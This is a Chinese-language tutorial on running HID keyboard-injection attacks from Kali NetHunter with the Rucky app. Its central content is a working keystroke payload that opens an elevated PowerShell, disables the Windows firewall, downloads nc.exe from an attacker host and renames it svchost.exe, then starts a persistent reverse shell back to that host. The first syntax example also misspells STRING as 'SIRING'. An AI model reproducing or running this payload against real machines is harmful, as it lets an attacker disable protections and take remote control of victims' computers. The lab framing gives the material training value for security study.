NetHunter使用Rucky实现HID键盘数据模拟攻击
知识概要:
- NetHunter:是
Kali Linux
推出的移动Android
端的系统 - Rucky:是一种基于
HID
设备的攻击工具,其本质是一个可编程的键盘模拟器,可以用于快速执行各种攻击,例如在目标计算机上执行特定的命令、窃取密码等。 - HID:是指人体接口设备,常见的
HID
包括键盘、鼠标、摄像头等USB
设备。攻击者可以在HID
设备上植入恶意代码,然后通过连接该设备到计算机,让计算机误认为该HID
设备是一个普通的键盘或鼠标,并执行隐藏的恶意操作
首先你的Android
设备需要拥有ROOT
权限访问你的硬件借口,第二是你的USB
数据口需要你的内核开放HID
攻击的功能,刷入Nethunter
的内核是支持的,如果需要刷入NetHunter
可以查看我之前刷入NetHunter
的文档
好的这里我们开始实验,可以在NetHunter商店
中下载Rucky
,可以在Github
中下载比较新的版本: https://github.com/mayankmetha/Rucky
如果想要深入的了解可以如查阅Rucky
语法的相关资料,基本的语法就是
DELAY 2000
GUI r
SIRING cmd
ENTER
DELAY 2000
SIRING whoami
例如上述:
- DELAY 2000: 2000表示需要等待2秒
- GUI r: GUI键盘上的
Win
键,r
表示输入r
键 - SIRING : 往窗口输入字符
cmd
- cmd: 模拟键盘摁下
ENTER
回车键
所以上述脚本就是会打开cmd
窗口,然后执行whoami
命令
例如下方下载nc.exe
,然后使用`nc.exe`反弹shell的脚本
DELAY 2000
GUI r
DELAY 300
STRING powershell
CTRL SHIFT ENTER
DELAY 2000
STRING netsh advfirewall set allprofiles state off
ENTER
DELAY 800
STRING exit
ENTER
DELAY 1000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING echo (wget 'http://192.168.122.222:8080/nc.exe' -OutFile svchost.exe) > b.ps1
ENTER
DELAY 1000
STRING powershell -ExecutionPolicy ByPass -File b.ps1
ENTER
DELAY 3000
STRING echo while($true){./svchost.exe 192.168.122.222 443 -e cmd.exe -d} > c.ps1
ENTER
DELAY 1000
STRING start /min powershell -ExecutionPolicy ByPass -File c.ps1 & exit
DELAY 1000
ENTER